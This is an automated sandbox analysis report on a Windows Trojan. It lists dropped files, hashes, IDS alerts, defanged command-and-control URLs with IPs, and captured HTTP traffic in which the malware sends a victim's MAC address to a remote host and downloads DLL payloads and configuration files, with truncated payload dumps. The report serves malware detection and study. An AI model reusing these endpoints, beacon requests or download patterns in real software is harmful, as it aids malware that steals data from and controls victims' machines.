The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 72 F7 B1 07 EF 3D C4 60 2B 2F D5 80 99 C1 E7"

Dropped PE files

MD5	File path
cf1cdb854f655fd69597335e96de6792	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4.tmp
75434d6228364bfd1102c97edd346485	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA27678.tmp
1fad2419bc27270ef354b4cd18ea29fe	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA6871.tmp
73e40295ab0e0c740b114b9251042b87	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA8273.tmp
bd79d4230e8cf291fefc260a1b1030c0	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBC263.TMP
d4424c25155d688f00f89bfa6d2bc534	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBIC753.TMP
9484c04258830aa3c2f2a70eb041414c	c:\WINDOWS\system32\mswinsck.ocx

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	118784	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	122880	118784	115712	5.53848	b72c9776fd3a7b7dc02aae29753eda36
.rsrc	241664	4096	512	2.49332	5d5a0a9007054812fac418762132b2f3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
e4296b98643be0faa0f61186d64462cb

URLs

URL	IP
hxxp://1stcncloudsave.cloud.ourwebpic.com/file.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/taian.ini
hxxp://1stcncloudsave.cloud.ourwebpic.com/osm.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/ip.asp
hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian
hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar
hxxp://1stcncloudsave.cloud.ourwebpic.com/newcor.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/serList.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/pubjc.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com//send/safeen.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/exitpop.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/yxjpq.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/eb.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/jzyxj.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/tfgg.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/homepro.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/prosafe.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/addjs/jslist.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzjc.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzurl.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/newDomain.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/urlRemote.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/Spid_jc_id.ini
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jwico.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_enlc.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd.txt
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_2345title_en.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/icdata.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2safe.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2.txt
hxxp://yxtt.v138.net/send/prosafe.txt	115.231.84.95
hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian	118.180.9.137
hxxp://yxtt.v138.net/send/tfgg.txt	115.231.84.95
hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar	118.180.9.137
hxxp://www.topyouxi.net/homepro.txt	218.92.226.46
hxxp://user.yswm.net/yswm/Spid_jc_id.ini	218.92.226.45
hxxp://yxtt.v138.net/send/addjs/jslist.txt	115.231.84.95
hxxp://down.369k.net/icdata.dll	218.92.226.45
hxxp://yxtt.v138.net/send/eb.txt	115.231.84.95
hxxp://123.1313k.net/send/InsertWnd_enlc.dll	218.92.226.45
hxxp://yxtt.v138.net/send/InsertWnd.txt	115.231.84.95
hxxp://yxtt.v138.net/send/yxjk/yxjpq.txt	115.231.84.95
hxxp://123.1313k.net//send/safeen.txt	218.92.226.45
hxxp://www.topyouxi.net/urlRemote.txt	218.92.226.46
hxxp://yxtt.v138.net/send/jwico.txt	115.231.84.95
hxxp://yxtt.v138.net/send/jzjc/jzjc.txt	115.231.84.95
hxxp://yxtt.yswm.net/send/ico2.txt	115.231.84.94
hxxp://user.yswm.net/yswm/taian.ini	218.92.226.45
hxxp://yxtt.v138.net/send/pubjc.txt	115.231.84.95
hxxp://www.pc918.net/file.txt	115.231.84.94
hxxp://yxtt.v138.net/send/exitpop.txt	115.231.84.95
hxxp://yxtt.yswm.net/send/ico2safe.txt	115.231.84.94
hxxp://yxtt.v138.net/send/jzjc/jzurl.txt	115.231.84.95
hxxp://yxtt.v138.net/send/yxjk/jzyxj.txt	115.231.84.95
hxxp://1212.ip138.com/ic.asp	119.167.164.43
hxxp://yxtt.v138.net/send/newDomain.txt	115.231.84.95
hxxp://www.topyouxi.net/newcor.dll	218.92.226.46
hxxp://www.topyouxi.net/osm.dll	218.92.226.46
hxxp://www.yswm.net/ip.asp	115.231.84.95
hxxp://yxtt.v138.net/send/serList.txt	115.231.84.95
hxxp://yxtt.v138.net/send/InsertWnd_2345title_en.dll	115.231.84.95

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE suspicious User-Agent (vb wininet)
SURICATA HTTP invalid content length field in response
ET TROJAN Generic Password Stealer User Agent Detected (RookIE)

Traffic

GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1

User-Agent: vb   wininet

Host: mactj.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 25 Sep 2016 01:28:38 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 4

Content-Type: text/html

Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD; path=/

Cache-Control: private

X-Cache: MISS from cache.51cdn.com

X-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)

Connection: keep-alive

err!HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:38 GMT..Server: Micr
osoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 4..Content-Type:
 text/html..Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD;
 path=/..Cache-Control: private..X-Cache: MISS from cache.51cdn.com..X
-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)..Connection: keep-ali
ve..err!..

GET //send/safeen.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 123.1313k.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 08:57:04 GMT

Content-Length: 2942

Content-Type: text/plain

Last-Modified: Sat, 24 Sep 2016 02:08:11 GMT

Accept-Ranges: bytes

ETag: "9e7c6380816d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh92:3 (Cdn Cache Server V2.0), 1.1 jsycdx41:6 (Cdn Cache Server V2.0)

Connection: keep-alive
QW...NONNOL=.....MR]^=.............Q\.=.NIHS...!..ATA.....S...=..W..s@
DILHHNDD=...FV\..WHENKJ=....U]].WDLJJIE=....U]].WHEOKH=.....^\TWHEOKE=
......_U.HENLK=.......V..EOKJ=LMMLMO..\r.LMMEKS..=DQW[..s..NOMNS......
.\V.R..S...=..ZV...JMKMWHE..S...qJF....S...=.....Q]=...S=..."...TJsR..
.B=R...N".P[W.S...R...=...UG....R......!..XVFS...R........TrD..S.....S
...LAr.D...S...=S...^AUS...=SDOM..L.^_s.....S....."MRZR.....S...R...EW
].=S......S....A....."...=HSSRVS^.S...=......Q...N=SLJNS...!..A.@..@LM
H=OKISWS.r.OLODDS...=...FK....=OLJJJL!PU...HK=....SL...PC.P..=SMJDLDS.
..q..OON...=.SLPQP.QP=ONOON..=DXWV...S...=DK..S....r.......S...!..P\B.
S..=S..S...#KZZ..ES..=.......Q\.=.....S...M.X\ZRD.R.....S...q.J.KMEMS.
..=....YV...S...=.@PVR..........=NLPTLX\W..S...=...OW[......R.."...!..
\[email protected]...=..._Q[..........O..\rG.SHL.....S...q^\.....*......#_X.ES.
..=.....L.^HV.....S...=...I[].S.....S...".XS].HNNS....=XRT...=........
S...q.T...S..=....V[..P..=.OMLHMHS[.ZY\=..JJMI=S...MR\sS....S...=...PF
Z..R...R.......r.......S...!L.T_R..S...=.....IWWZ.........S...qSB..W..
...S.."TWUR..S...=..DX[MR]^=DMNKMJJO=XS[...IO=DLKNEHOW"Z...KIHJ=..OMST
ZU.^R=.....SMJDP[MR]^=BJLLMNPMKQR#...LMNPMDDD=BVSS..sSON...S...N..\^P.
..ROLE=....MBEY..S...=...O..PTVOES...R......]rC...S.....S....TA...=S..
....L.^_.....=.......MR]^=....S.....L.^_s....WDMDMET"._@DWDMDLOI=.....
Er.MDOLE=S......G.P..=.......\PR.r.MDOEJ=.....L.TQR.S...=DLNHQZ#FEDS..
S...=...L.XB....=S........^\VS...=LONS....D.P..RBJLMEIPVQT.r.H..S...=.
....C..WDIDNLJHL=XRZ...=..........HMH]F.....S...=...YS\....WS.....<<< skipped >>>

GET /send/InsertWnd_enlc.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 123.1313k.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 22:35:39 GMT

Content-Length: 124416

Content-Type: application/x-msdownload

Last-Modified: Fri, 08 Jul 2016 12:31:29 GMT

Accept-Ranges: bytes

ETag: "5828f9a614d9d11:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:5 (Cdn Cache Server V2.0)

Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}aO...Z....
.........!.G.....n.......#.......#.........I...........m=?.P...r#j....
.m=%.[...r#l.....0.RZZ...}}}}}}}abc123}}}-8}}1|~a..Ne3}}}}}}}.}.@ib:23
.|}}m}}}}yaR.423my}}.x}}}}qbs123.}}x}|}}}}agc023}}}}}{}}m}abc121}=|}}m
}}m}abc!23m}}}}}}m}}a~.42[}}}..x}=.}ab.42.|}}}}}}}}}abc123}}}..x}e}}ab
c123}}}}}}}}}}abc123}}}}}}}}}}ar.42{}}}}}}}}}}abc123}}}}}}}}}}abc123}}
}}}}}}}}a73i.3}}}}}y}}m}abc123y}}}}}}}}}abc12.}}.(-%L}}}ab.023my}}.|}}
y}abc123}}}}}}}=}}.L.B@P}}}}m}}}.xabe123.|}}}}}}}}abc12s}}.}}}}}}}abc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw.....J....42..|}}'x}[q}!x`1.............,...
..p...~QW..F.!ZxiQ.{x.$Z..GA..i....z3. ......`..f.T.B..x..pj>P..zh.
..jX.Q......c.)g;...........'C......;7.$.&.....Q.l...*q [email protected]
...FVIr........=.....j....y...Zw..y..i..Y.........t...".........t..M..
....6..A..<.v.}..{[email protected]../..m..L...a.j..H....8P.NR...n
..X........$T.Jx. $..C.L.O..,~L.....T`....jv5=2..........JZ.*WU ..R0..
.C.>w.!Y...v.9..sg..{. ..:_..A..c.....)*...Sz...CEi..\yMu....e..)..
5...D...C..z....G..J]....oi..3.k.h-....>..V..."..t.P'.~.`..Y.R.<<< skipped >>>

GET /file.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.pc918.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Wed, 03 Aug 2016 07:55:10 GMT

Content-Length: 199

Content-Type: text/plain

Last-Modified: Fri, 20 May 2016 16:38:12 GMT

Accept-Ranges: bytes

ETag: "a86150b6b2d11:a470"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cache Server V2.0)

Connection: keep-alive
[Basic]..Url1=hXXp://VVV.topyouxi.net/osm.dll..Url2=hXXp://down.v718.c
om/osm.dll..md5=65F7B70B548389ADE039D1804C893694..Filepath=..dll=..Exe
Name=..config=hXXp://user.yswm.net/yswm/..Jm=1..time=6000..HTTP/1.1 20
0 OK..Date: Wed, 03 Aug 2016 07:55:10 GMT..Content-Length: 199..Conten
t-Type: text/plain..Last-Modified: Fri, 20 May 2016 16:38:12 GMT..Acce
pt-Ranges: bytes..ETag: "a86150b6b2d11:a470"..Server: Microsoft-IIS/6.
0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X
-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cach
e Server V2.0)..Connection: keep-alive..[Basic]..Url1=hXXp://VVV.topyo
uxi.net/osm.dll..Url2=hXXp://down.v718.com/osm.dll..md5=65F7B70B548389
ADE039D1804C893694..Filepath=..dll=..ExeName=..config=hXXp://user.yswm
.net/yswm/..Jm=1..time=6000....

GET /yswm/taian.ini HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: user.yswm.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 12:29:07 GMT

Content-Length: 503

Content-Type: application/vnd.rn

Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT

Accept-Ranges: bytes

ETag: "3679b94fba96d11:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)

Connection: keep-alive
[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=..
..[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=new
lock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@
lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@q
qclose@icojc@addjc@tcclose@[email protected]=..prisafe=..HTT
P/1.1 200 OK..Date: Sat, 24 Sep 2016 12:29:07 GMT..Content-Length: 503
..Content-Type: application/vnd.rn..Last-Modified: Fri, 15 Apr 2016 01
:58:31 GMT..Accept-Ranges: bytes..ETag: "3679b94fba96d11:a652"..Server
: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from 
cache.51cdn.com..X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jin
h94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..[UnionID]..Url=
..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=
..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....
[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclos
e@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@ad
djc@tcclose@[email protected]=..prisafe=......
<<< skipped >>>

GET /yswm/taian.ini HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: user.yswm.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 12:29:07 GMT

Content-Length: 503

Content-Type: application/vnd.rn

Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT

Accept-Ranges: bytes

ETag: "3679b94fba96d11:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)

Connection: keep-alive
[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=..
..[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=new
lock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@
lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@q
qclose@icojc@addjc@tcclose@[email protected]=..prisafe=..HTT
P/1.1 200 OK..Date: Sat, 24 Sep 2016 12:29:07 GMT..Content-Length: 503
..Content-Type: application/vnd.rn..Last-Modified: Fri, 15 Apr 2016 01
:58:31 GMT..Accept-Ranges: bytes..ETag: "3679b94fba96d11:a652"..Server
: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from 
cache.51cdn.com..X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jin
h94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..[UnionID]..Url=
..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=
..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....
[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclos
e@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@ad
djc@tcclose@[email protected]=..prisafe=......
<<< skipped >>>

GET /yswm/Spid_jc_id.ini HTTP/1.1

User-Agent: RookIE/1.0

Host: user.yswm.net


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 05:12:33 GMT

Content-Length: 6

Content-Type: application/vnd.rn

Last-Modified: Mon, 12 Oct 2015 02:30:03 GMT

Accept-Ranges: bytes

ETag: "4c19d3e6954d11:a3bc"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)

Connection: keep-alive

9904..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 05:12:33 GMT..Content-Le
ngth: 6..Content-Type: application/vnd.rn..Last-Modified: Mon, 12 Oct 
2015 02:30:03 GMT..Accept-Ranges: bytes..ETag: "4c19d3e6954d11:a3bc"..
Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT
 from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0),
 1.1 jinh94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..9904...
.

GET /icdata.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: down.369k.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 01:47:22 GMT

Content-Length: 136192

Content-Type: application/x-msdownload

Last-Modified: Wed, 21 Sep 2016 01:45:25 GMT

Accept-Ranges: bytes

ETag: "dc41e7d2a913d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh93:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:1 (Cdn Cache Server V2.0)

Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......:..
.:...:.......:.......:...w. .:.......:.......:.....4.:..1....:../....:
..1....:.......:..1....:./.....:.bc123}}}}}}}}}}a2&12.|~}...*}}}abc12.
}.\v|v}}m.abs123..}..y}}..ab.523}}m}m}}}.}agc023}}}x}|}}}}ab.523m}}}}}
}.}=`bc!23m}}}}m}}m}abc12#}}}..y}.}}ab.52K.}}}.y}}~}abc123}}}}}}}}}}af
.52 }}}}}}}}}}abc123}}}}}}}}}}abc123}}}..y}5}}abc123}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}(-%M}}}ab.323m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}m.}}
..abk323y}}}}}}}}}abc12s}}.S....}}abs123.y}}u}}}q.abc123}}}}}}}=}}.bc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw..&<..8...52..|}}'y}[q}.x`1..........U..B
...'.w.P.........L..i., .......l.J..U.[...&.c8.R.'..K..R.<.........
Q.....B.....U{_. ..X..<..=.=4...z...R....A`P....uh.....8....-.,#.l.
.)..,.E.l.S.,..........8Xoh..0.[.|...e%}.m<.boy..... .....\Cd.cI]#.
.........F...z6.!I....8.)."...BD1.(.....zJ....?V.....u..T.....K....l..
'..I.x.p...!.......Y....)...$s_?........u(......E0v 0.1.v..<.|.....
..%$......p.._.2i.8........!.:..8C.dj ......:..3..H.2..........>.S.
..h#|....%.....5.Z......;.F......0.y.4 .I..D.o.(B.3<^\.=...z.u.<<< skipped >>>

GET /send/ico2safe.txt HTTP/1.1

User-Agent: RookIE/1.0

Host: yxtt.yswm.net


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 02:57:12 GMT

Content-Length: 58

Content-Type: text/plain

Last-Modified: Wed, 21 Sep 2016 02:27:29 GMT

Accept-Ranges: bytes

ETag: "988b87b3af13d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc109:0 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)

Connection: keep-alive

@.....@hnrw*-......-@lhm*[email protected]...@hnrw*-........-....

GET /send/ico2.txt HTTP/1.1

User-Agent: RookIE/1.0

Host: yxtt.yswm.net


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 03:15:23 GMT

Content-Length: 11304

Content-Type: text/plain

Last-Modified: Wed, 21 Sep 2016 03:13:30 GMT

Accept-Ranges: bytes

ETag: "d0bbba20b613d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 chdx113:4 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)

Connection: keep-alive
........^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3..........^hXXp://VVV.
yaojyw.net/hnyx/yxsix.html^3............^hXXp://VVV.yaojyw.net/hnyx/yx
four.html^3............^hXXp://VVV.yaojyw.net/hnyx/yxfour.html^3......
^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3........^hXXp://VVV.yaojyw.net
/hnyx/yxfour.html^3............1.76....^hXXp://VVV.168wm.net/zbjc2/ind
ex.htm^3..........^hXXp://VVV.168wm.net/zbjc1/index.htm^3........^http
://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc
1/index.htm^3........-........3D^hXXp://VVV.168wm.net/zbjc1/index.htm^
3......88..^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://ww
w.168wm.net/zbjc1/index.htm^3......10000..^hXXp://VVV.168wm.net/zbjc2/
index.htm^3..............^hXXp://VVV.168wm.net/zbjc2/index.htm^3......
................^hXXp://VVV.168wm.net/zbjc1/index.htm^3..........^http
://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc
1/index.htm^3....boss..SS......^hXXp://VVV.168wm.net/zbjc2/index.htm^3
....................^hXXp://VVV.168wm.net/zbjc2/index.htm^3...........
. ..........^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........   ......
....^hXXp://VVV.168wm.net/zbjc2/index.htm^3..xy........^hXXp://VVV.168
wm.net/zbjc2/index.htm^3................^hXXp://VVV.168wm.net/zbjc2/in
dex.htm^3............999......^hXXp://VVV.168wm.net/zbjc2/index.htm^3.
.............^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://
VVV.168wm.net/zbjc2/index.htm^3....................^hXXp://VVV.168wm.n
et/zbjc2/index.htm^3........100%....^hXXp://VVV.168wm.net/zbjc2/in<<< skipped >>>

GET /send/serList.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 15:03:22 GMT

Content-Length: 1521

Content-Type: text/plain

Last-Modified: Wed, 03 Aug 2016 02:32:29 GMT

Accept-Ranges: bytes

ETag: "58decd472fedd11:a470"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jinh93:3 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)

Connection: keep-alive
..................@................@........ ..........@..............
......@2014............@............ - @.................... - @120.27
[email protected]..@....................@3D........@............@......
....................@....................@............@...............
.....OK........@............ @......................@.................
.....@[email protected]........@........
................ @....................@....................@..........
........ -@...................... -@................................@.
............. -@................@..................................@..
................@[email protected][email protected].
[email protected][email protected]............@.......
[email protected]@................@................
[email protected][email protected]....................
[email protected]........................@....................
....@[email protected][email protected]...........
[email protected]........ ............-............-........ @3.....
.-................-........@[email protected]..........
..........@....................@................@.....................
...@..........................@..................................@....
[email protected]........@........ - ........@
........ ........-........@[email protected]/
page@.................. - 7..26........................
<<< skipped >>>

GET /send/pubjc.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

